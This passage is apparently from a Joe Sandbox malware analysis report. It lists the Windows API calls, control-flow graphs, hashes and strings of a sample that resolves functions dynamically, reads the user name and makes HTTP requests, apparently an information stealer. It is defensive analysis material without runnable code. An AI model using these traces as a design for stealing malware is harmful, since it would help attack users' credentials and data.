                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: 8f90f8d48abf69c85310177eeeac8755e55a68b1692fe4fb27cf99081a984fa8
                          • Instruction ID: 92b6c8ec278aa15014a62498c8f52dfcd21c9edaf17a035de0ebf1300bdcdb01
                          • Opcode Fuzzy Hash: 8f90f8d48abf69c85310177eeeac8755e55a68b1692fe4fb27cf99081a984fa8
                          • Instruction Fuzzy Hash: D931E138FC0A2C769620EBEF4C4BFDF6E55FF85BA8B2280567408571C0C9B15501EEA2
                          Function 00532A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00532A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00532A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00532A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 31ba5727a6b79aee0971a2f4563029d930cbd16914b44dcefbc53a71a542149f
                          • Instruction ID: 55df9cff7ed8e2e6ae02935660f9119f85843bf2e625f0a9d67746dfcaddbf19
                          • Opcode Fuzzy Hash: 31ba5727a6b79aee0971a2f4563029d930cbd16914b44dcefbc53a71a542149f
                          • Instruction Fuzzy Hash: 76F0B4B5A40208ABC710DF88DD49B9EBBBCF705B21F000217FA15E3690D7B8190486A1
                          Function 005366E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 5366e0-5366e7 634 536afe-536b92 LoadLibraryA * 8 633->634 635 5366ed-536af9 GetProcAddress * 43 633->635 636 536b94-536c03 GetProcAddress * 5 634->636 637 536c08-536c0f 634->637 635->634 636->637 638 536cd2-536cd9 637->638 639 536c15-536ccd GetProcAddress * 8 637->639 640 536cdb-536d4a GetProcAddress * 5 638->640 641 536d4f-536d56 638->641 639->638 640->641 642 536de9-536df0 641->642 643 536d5c-536de4 GetProcAddress * 6 641->643 644 536f10-536f17 642->644 645 536df6-536f0b GetProcAddress * 12 642->645 643->642 646 536f19-536f88 GetProcAddress * 5 644->646 647 536f8d-536f94 644->647 645->644 646->647 648 536fc1-536fc8 647->648 649 536f96-536fbc GetProcAddress * 2 647->649 650 536ff5-536ffc 648->650 651 536fca-536ff0 GetProcAddress * 2 648->651 649->648 652 537002-5370e8 GetProcAddress * 10 650->652 653 5370ed-5370f4 650->653 651->650 652->653 654 537152-537159 653->654 655 5370f6-53714d GetProcAddress * 4 653->655 656 53715b-537169 GetProcAddress 654->656 657 53716e-537175 654->657 655->654 656->657 658 5371d3 657->658 659 537177-5371ce GetProcAddress * 4 657->659 659->658
                          APIs
                          • GetProcAddress.KERNEL32(75900000,011968A0), ref: 005366F5
                          • GetProcAddress.KERNEL32(75900000,01196920), ref: 0053670D
                          • GetProcAddress.KERNEL32(75900000,011A8C28), ref: 00536726
                          • GetProcAddress.KERNEL32(75900000,011A8C70), ref: 0053673E
                          • GetProcAddress.KERNEL32(75900000,011AC9C8), ref: 00536756
                          • GetProcAddress.KERNEL32(75900000,011ACB00), ref: 0053676F
                          • GetProcAddress.KERNEL32(75900000,0119B338), ref: 00536787
                          • GetProcAddress.KERNEL32(75900000,011ACB18), ref: 0053679F
                          • GetProcAddress.KERNEL32(75900000,011AC968), ref: 005367B8
                          • GetProcAddress.KERNEL32(75900000,011ACB60), ref: 005367D0
                          • GetProcAddress.KERNEL32(75900000,011ACAE8), ref: 005367E8
                          • GetProcAddress.KERNEL32(75900000,01196960), ref: 00536801
                          • GetProcAddress.KERNEL32(75900000,01196760), ref: 00536819
                          • GetProcAddress.KERNEL32(75900000,011967E0), ref: 00536831
                          • GetProcAddress.KERNEL32(75900000,01196980), ref: 0053684A
                          • GetProcAddress.KERNEL32(75900000,011AC9E0), ref: 00536862
                          • GetProcAddress.KERNEL32(75900000,011ACBC0), ref: 0053687A
                          • GetProcAddress.KERNEL32(75900000,0119AE88), ref: 00536893
                          • GetProcAddress.KERNEL32(75900000,011969A0), ref: 005368AB
                          • GetProcAddress.KERNEL32(75900000,011AC9F8), ref: 005368C3
                          • GetProcAddress.KERNEL32(75900000,011ACC08), ref: 005368DC
                          • GetProcAddress.KERNEL32(75900000,011ACB90), ref: 005368F4
                          • GetProcAddress.KERNEL32(75900000,011AC998), ref: 0053690C
                          • GetProcAddress.KERNEL32(75900000,011969C0), ref: 00536925
                          • GetProcAddress.KERNEL32(75900000,011ACB78), ref: 0053693D
                          • GetProcAddress.KERNEL32(75900000,011ACA10), ref: 00536955
                          • GetProcAddress.KERNEL32(75900000,011ACBD8), ref: 0053696E
                          • GetProcAddress.KERNEL32(75900000,011ACBA8), ref: 00536986
                          • GetProcAddress.KERNEL32(75900000,011ACBF0), ref: 0053699E
                          • GetProcAddress.KERNEL32(75900000,011AC920), ref: 005369B7
                          • GetProcAddress.KERNEL32(75900000,011AC9B0), ref: 005369CF
                          • GetProcAddress.KERNEL32(75900000,011ACA28), ref: 005369E7
                          • GetProcAddress.KERNEL32(75900000,011AC938), ref: 00536A00
                          • GetProcAddress.KERNEL32(75900000,011A9B08), ref: 00536A18
                          • GetProcAddress.KERNEL32(75900000,011ACA58), ref: 00536A30
                          • GetProcAddress.KERNEL32(75900000,011ACA70), ref: 00536A49
                          • GetProcAddress.KERNEL32(75900000,011969E0), ref: 00536A61
                          • GetProcAddress.KERNEL32(75900000,011ACA40), ref: 00536A79
                          • GetProcAddress.KERNEL32(75900000,01196A00), ref: 00536A92
                          • GetProcAddress.KERNEL32(75900000,011AC950), ref: 00536AAA
                          • GetProcAddress.KERNEL32(75900000,011AC980), ref: 00536AC2
                          • GetProcAddress.KERNEL32(75900000,01196540), ref: 00536ADB
                          • GetProcAddress.KERNEL32(75900000,011963A0), ref: 00536AF3
                          • LoadLibraryA.KERNEL32(011ACB30,0053051F), ref: 00536B05
                          • LoadLibraryA.KERNEL32(011ACA88), ref: 00536B16
                          • LoadLibraryA.KERNEL32(011ACAA0), ref: 00536B28
                          • LoadLibraryA.KERNEL32(011ACAB8), ref: 00536B3A
                          • LoadLibraryA.KERNEL32(011ACAD0), ref: 00536B4B
                          • LoadLibraryA.KERNEL32(011ACB48), ref: 00536B5D
                          • LoadLibraryA.KERNEL32(011ACF08), ref: 00536B6F
                          • LoadLibraryA.KERNEL32(011ACCC8), ref: 00536B80
                          • GetProcAddress.KERNEL32(75FD0000,01196460), ref: 00536B9C
                          • GetProcAddress.KERNEL32(75FD0000,011ACD40), ref: 00536BB4
                          • GetProcAddress.KERNEL32(75FD0000,011A88A0), ref: 00536BCD
                          • GetProcAddress.KERNEL32(75FD0000,011ACED8), ref: 00536BE5
                          • GetProcAddress.KERNEL32(75FD0000,01196360), ref: 00536BFD
                          • GetProcAddress.KERNEL32(734B0000,0119AF78), ref: 00536C1D
                          • GetProcAddress.KERNEL32(734B0000,011962A0), ref: 00536C35
                          • GetProcAddress.KERNEL32(734B0000,0119B068), ref: 00536C4E
                          • GetProcAddress.KERNEL32(734B0000,011ACEF0), ref: 00536C66
                          • GetProcAddress.KERNEL32(734B0000,011ACC20), ref: 00536C7E
                          • GetProcAddress.KERNEL32(734B0000,01196440), ref: 00536C97
                          • GetProcAddress.KERNEL32(734B0000,011964C0), ref: 00536CAF
                          • GetProcAddress.KERNEL32(734B0000,011ACDA0), ref: 00536CC7
                          • GetProcAddress.KERNEL32(763B0000,01196520), ref: 00536CE3
                          • GetProcAddress.KERNEL32(763B0000,01196640), ref: 00536CFB
                          • GetProcAddress.KERNEL32(763B0000,011ACD28), ref: 00536D14
                          • GetProcAddress.KERNEL32(763B0000,011ACD10), ref: 00536D2C
                          • GetProcAddress.KERNEL32(763B0000,01196420), ref: 00536D44
                          • GetProcAddress.KERNEL32(750F0000,0119B0B8), ref: 00536D64
                          • GetProcAddress.KERNEL32(750F0000,0119B1F8), ref: 00536D7C
                          • GetProcAddress.KERNEL32(750F0000,011ACCB0), ref: 00536D95
                          • GetProcAddress.KERNEL32(750F0000,011964E0), ref: 00536DAD
                          • GetProcAddress.KERNEL32(750F0000,01196580), ref: 00536DC5
                          • GetProcAddress.KERNEL32(750F0000,0119B1A8), ref: 00536DDE
                          • GetProcAddress.KERNEL32(75A50000,011ACE48), ref: 00536DFE
                          • GetProcAddress.KERNEL32(75A50000,01196480), ref: 00536E16
                          • GetProcAddress.KERNEL32(75A50000,011A8980), ref: 00536E2F
                          • GetProcAddress.KERNEL32(75A50000,011ACE18), ref: 00536E47
                          • GetProcAddress.KERNEL32(75A50000,011ACD58), ref: 00536E5F
                          • GetProcAddress.KERNEL32(75A50000,011964A0), ref: 00536E78
                          • GetProcAddress.KERNEL32(75A50000,011965A0), ref: 00536E90
                          • GetProcAddress.KERNEL32(75A50000,011ACCE0), ref: 00536EA8
                          • GetProcAddress.KERNEL32(75A50000,011ACDB8), ref: 00536EC1
                          • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00536ED7
                          • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00536EEE
                          • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00536F05
                          • GetProcAddress.KERNEL32(75070000,01196380), ref: 00536F21
                          • GetProcAddress.KERNEL32(75070000,011ACDD0), ref: 00536F39
                          • GetProcAddress.KERNEL32(75070000,011ACCF8), ref: 00536F52
                          • GetProcAddress.KERNEL32(75070000,011ACD70), ref: 00536F6A
                          • GetProcAddress.KERNEL32(75070000,011ACD88), ref: 00536F82
                          • GetProcAddress.KERNEL32(74E50000,01196660), ref: 00536F9E
                          • GetProcAddress.KERNEL32(74E50000,01196560), ref: 00536FB6
                          • GetProcAddress.KERNEL32(75320000,01196500), ref: 00536FD2
                          • GetProcAddress.KERNEL32(75320000,011ACE60), ref: 00536FEA
                          • GetProcAddress.KERNEL32(6F060000,01196600), ref: 0053700A
                          • GetProcAddress.KERNEL32(6F060000,011965C0), ref: 00537022
                          • GetProcAddress.KERNEL32(6F060000,01196400), ref: 0053703B
                          • GetProcAddress.KERNEL32(6F060000,011ACDE8), ref: 00537053
                          • GetProcAddress.KERNEL32(6F060000,011965E0), ref: 0053706B
                          • GetProcAddress.KERNEL32(6F060000,01196280), ref: 00537084
                          • GetProcAddress.KERNEL32(6F060000,01196620), ref: 0053709C
                          • GetProcAddress.KERNEL32(6F060000,011962C0), ref: 005370B4
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 005370CB
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 005370E2
                          • GetProcAddress.KERNEL32(74E00000,011ACE00), ref: 005370FE
                          • GetProcAddress.KERNEL32(74E00000,011A88F0), ref: 00537116
                          • GetProcAddress.KERNEL32(74E00000,011ACE30), ref: 0053712F
                          • GetProcAddress.KERNEL32(74E00000,011ACE78), ref: 00537147
                          • GetProcAddress.KERNEL32(74DF0000,011962E0), ref: 00537163
                          • GetProcAddress.KERNEL32(6CF00000,011ACE90), ref: 0053717F
                          • GetProcAddress.KERNEL32(6CF00000,01196300), ref: 00537197
                          • GetProcAddress.KERNEL32(6CF00000,011ACEA8), ref: 005371B0
                          • GetProcAddress.KERNEL32(6CF00000,011ACEC0), ref: 005371C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 712b18823ec3b6885107e736e8e007cde1c968e66126cec3e0487f0ab5c76e3e
                          • Instruction ID: 38481840c3efb74af1ef28e2fb3a876b8d3a1580cb2e812f006a6cea381b926e
                          • Opcode Fuzzy Hash: 712b18823ec3b6885107e736e8e007cde1c968e66126cec3e0487f0ab5c76e3e
                          • Instruction Fuzzy Hash: B06253BD61121ADFD794DF64EC89A2B37B9F78A201300C51BEA5583374EB3D9800DB29
                          Function 0052F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(0053CFEC), ref: 0052F1D5
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F1F1
                          • lstrlen.KERNEL32(0053CFEC), ref: 0052F1FC
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F215
                          • lstrlen.KERNEL32(0053CFEC), ref: 0052F220
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F239
                          • lstrcpy.KERNEL32(00000000,00544FA0), ref: 0052F25E
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F28C
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F2C0
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F2F0
                          • lstrlen.KERNEL32(01196900), ref: 0052F315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: b939c5eb3dde87e61703bd861252a5ed71fb58f49f6b2a64017ddf56bb25a069
                          • Instruction ID: e97c6684b440793cbde0af05e55ad70ff41301e88cf7cfb9719ce49de27d29ed
                          • Opcode Fuzzy Hash: b939c5eb3dde87e61703bd861252a5ed71fb58f49f6b2a64017ddf56bb25a069
                          • Instruction Fuzzy Hash: 47A24C74A012168FDB20DF69F948A5ABFF5BF46704F18847AE809DB2A1DB35DC81CB50
                          Function 0052FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530013
                          • lstrlen.KERNEL32(0053CFEC), ref: 005300BD
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005300E1
                          • lstrlen.KERNEL32(0053CFEC), ref: 005300EC
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530110
                          • lstrlen.KERNEL32(0053CFEC), ref: 0053011B
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0053013F
                          • lstrlen.KERNEL32(0053CFEC), ref: 0053015A
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530189
                          • lstrlen.KERNEL32(0053CFEC), ref: 00530194
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005301C3
                          • lstrlen.KERNEL32(0053CFEC), ref: 005301CE
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530206
                          • lstrlen.KERNEL32(0053CFEC), ref: 00530250
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530288
                          • lstrcpy.KERNEL32(00000000,?), ref: 0053059B
                          • lstrlen.KERNEL32(01196700), ref: 005305AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 005305D7
                          • lstrcat.KERNEL32(00000000,?), ref: 005305E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0053060E
                          • lstrlen.KERNEL32(011ADC78), ref: 00530625
                          • lstrcpy.KERNEL32(00000000,?), ref: 0053064C
                          • lstrcat.KERNEL32(00000000,?), ref: 00530658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00530681
                          • lstrlen.KERNEL32(011968E0), ref: 00530698
                          • lstrcpy.KERNEL32(00000000,?), ref: 005306C9
                          • lstrcat.KERNEL32(00000000,?), ref: 005306D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00530706
                          • lstrcpy.KERNEL32(00000000,011A88E0), ref: 0053074B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0053077F
                          • lstrcpy.KERNEL32(00000000,011ADCA8), ref: 005307E7
                          • lstrcpy.KERNEL32(00000000,011A8B70), ref: 00530858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 005308CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00530928
                          • lstrcpy.KERNEL32(00000000,011A8A20), ref: 005309F8
                            • Part of subcall function 005124E0: lstrcpy.KERNEL32(00000000,?), ref: 00512528
                            • Part of subcall function 005124E0: lstrcpy.KERNEL32(00000000,?), ref: 0051254E
                            • Part of subcall function 005124E0: lstrcpy.KERNEL32(00000000,?), ref: 00512577
                          • lstrcpy.KERNEL32(00000000,011A89F0), ref: 00530ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00530B81
                          • lstrcpy.KERNEL32(00000000,011A89F0), ref: 00530D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: 1cd87c706c6f079bd882d89beeedc3a237a9c8ff124f5ff15d360d98cddb718c
                          • Instruction ID: 30838ebe4209828ef01ec51b7aef140dba740c7665e2b5ab88168c36095ed872
                          • Opcode Fuzzy Hash: 1cd87c706c6f079bd882d89beeedc3a237a9c8ff124f5ff15d360d98cddb718c
                          • Instruction Fuzzy Hash: 1CE26C74A053418FD734DF29C488B6ABBE1BF89304F58856EE48D8B292DB31D885CF56
                          Function 00516C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2234 516c40-516c64 call 512930 2237 516c75-516c97 call 514bc0 2234->2237 2238 516c66-516c6b 2234->2238 2242 516c99 2237->2242 2243 516caa-516cba call 512930 2237->2243 2238->2237 2239 516c6d-516c6f lstrcpy 2238->2239 2239->2237 2244 516ca0-516ca8 2242->2244 2247 516cc8-516cf5 InternetOpenA StrCmpCA 2243->2247 2248 516cbc-516cc2 lstrcpy 2243->2248 2244->2243 2244->2244 2249 516cf7 2247->2249 2250 516cfa-516cfc 2247->2250 2248->2247 2249->2250 2251 516d02-516d22 InternetConnectA 2250->2251 2252 516ea8-516ebb call 512930 2250->2252 2254 516ea1-516ea2 InternetCloseHandle 2251->2254 2255 516d28-516d5d HttpOpenRequestA 2251->2255 2261 516ec9-516ee0 call 512a20 * 2 2252->2261 2262 516ebd-516ebf 2252->2262 2254->2252 2256 516d63-516d65 2255->2256 2257 516e94-516e9e InternetCloseHandle 2255->2257 2259 516d67-516d77 InternetSetOptionA 2256->2259 2260 516d7d-516dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2254 2259->2260 2263 516dd4-516de4 call 533d90 2260->2263 2264 516daf-516dd3 call 5371e0 call 512a20 * 2 2260->2264 2262->2261 2265 516ec1-516ec3 lstrcpy 2262->2265 2263->2264 2275 516de6-516de8 2263->2275 2265->2261 2277 516e8d-516e8e InternetCloseHandle 2275->2277 2278 516dee-516e07 InternetReadFile 2275->2278 2277->2257 2278->2277 2280 516e0d 2278->2280 2281 516e10-516e15 2280->2281 2281->2277 2283 516e17-516e3d call 537310 2281->2283 2286 516e44-516e51 call 512930 2283->2286 2287 516e3f call 512a20 2283->2287 2291 516e61-516e8b call 512a20 InternetReadFile 2286->2291 2292 516e53-516e57 2286->2292 2287->2286 2291->2277 2291->2281 2292->2291 2293 516e59-516e5b lstrcpy 2292->2293 2293->2291
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00516C6F
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00516CC2
                          • InternetOpenA.WININET(0053CFEC,00000001,00000000,00000000,00000000), ref: 00516CD5
                          • StrCmpCA.SHLWAPI(?,011AE4E8), ref: 00516CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00516D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,011ADD98,00000000,00000000,-00400100,00000000), ref: 00516D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00516D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00516D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00516DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00516DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00516E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00516E7D
                          • InternetCloseHandle.WININET(00000000), ref: 00516E8E
                          • InternetCloseHandle.WININET(?), ref: 00516E98
                          • InternetCloseHandle.WININET(00000000), ref: 00516EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00516EC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
